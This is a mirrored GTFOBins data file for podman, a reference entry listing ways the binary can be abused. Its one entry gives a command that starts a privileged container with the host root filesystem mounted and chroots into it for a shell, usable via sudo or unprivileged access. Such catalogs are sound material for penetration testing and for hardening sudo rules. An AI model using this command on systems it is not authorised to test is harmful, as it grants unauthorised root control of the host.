mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
12 lines
285 B
Plaintext
12 lines
285 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh
|
|
comment: |-
|
|
This requires an actual image to be available (e.g., `alpine`) downloading it if not present.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|